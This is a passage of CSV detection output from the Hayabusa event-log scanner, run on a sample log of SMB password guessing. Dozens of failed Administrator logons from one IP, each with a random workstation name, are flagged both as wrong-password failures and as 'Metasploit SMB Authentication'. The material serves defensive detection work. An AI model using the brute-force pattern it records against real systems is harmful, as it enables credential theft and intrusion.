Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:32.849 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eYFPV1kGALqX8jyO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:32.849 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:32.884 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qIlhxT4qqo5bCsU3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:32.884 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:32.928 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: btoOskH0112h7MTO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:32.928 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:32.972 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nWUhQJBcS7XbMJUq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:32.972 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:33.004 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: E70qmXDDWqmWJjyU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:33.004 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:33.047 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oX0L8wf6nt2grLvn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:33.047 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:33.081 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0D8BwniiXsjfkYqE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:33.081 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:33.124 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sSWYo4mphuvKHQHl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:33.124 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:33.164 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: im8an1mDle9f8skd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:33.164 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:33.200 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aOyLWd5CAAjnJt3C : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:33.200 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:33.240 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: s7gI55uWlshCLw3y : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:33.240 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:33.288 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: l7UogJ8bBw6Epbht : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:33.288 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:33.328 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qIl0QRFHXCVAHWdV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:33.328 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:33.370 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OxPv9v4TxFvS9JMy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:33.370 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:33.417 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: uHMGfCorrLXpDyeD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:33.417 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:33.452 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KQTKgFibIa8NWExO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:33.452 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:33.492 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rEnx3upH3Om0wHn7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:33.492 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:33.532 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KlNbW1ljPSTdgUKY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:33.532 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:33.582 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: w2WMd3HugfjSwJPJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:33.582 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:33.628 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yEy0C6dMhysbNDrX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:33.628 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:33.666 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vxlayd8pnAZ3dZ2Q : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:33.666 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:33.701 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PhKO1jyWqVEdC9w2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:33.701 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:33.736 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dAH2mHJ4ZK5GS2p0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:33.736 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:33.776 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lV2ZIWGGwlkyEMRB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:33.776 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:33.811 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sum2yMFio9KLwZk5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:33.811 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:33.848 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fICXSRvv9Vm0uVpY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:33.848 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:33.894 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IgrOk6Fjp0QtfJ3i : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:33.894 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:33.936 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OPKoHLtxNoiG65sl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:33.936 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:33.972 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NctXRH1DR3slfVxQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:33.972 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:34.012 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vLnAs36K1mTivu2w : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:34.012 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:34.056 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: H7crZQ0eQ5RDNIp7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:34.056 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:34.108 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yHjgGhEtZgNwjaii : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:34.108 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:34.148 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: y5gi2SS2mQiDylQ8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:34.148 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:34.186 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kqWJGguiWBEplJiZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:34.186 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:34.228 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RWP4luPa3lFolQVI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:34.228 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:34.276 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5K9DQWbzslRZZMSC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:34.276 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:34.329 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5qm0L113v24jlfjx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:34.329 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:34.360 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: seuUjyGmNlyYT4tU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:34.360 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:34.400 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FljAF4LWLmWNa3kL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:34.400 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:34.447 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RnN5mBOaAvYu25G7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:34.447 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:34.476 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: llBt31S46QVzg0Ki : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:34.476 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:34.524 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: b1rvJUZo91Kka0G1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:34.524 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:34.573 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7Zqi86ZSFGRnoFM4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:34.573 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:34.680 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GeyeVdCUmHEKxR8f : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:34.680 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:34.708 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DwxJVXt79KBZalqS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:34.708 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:34.748 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TDfRu1OTlHmyc38P : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:34.748 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:34.790 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OLCAMPDWti9hjHtV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:34.790 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB 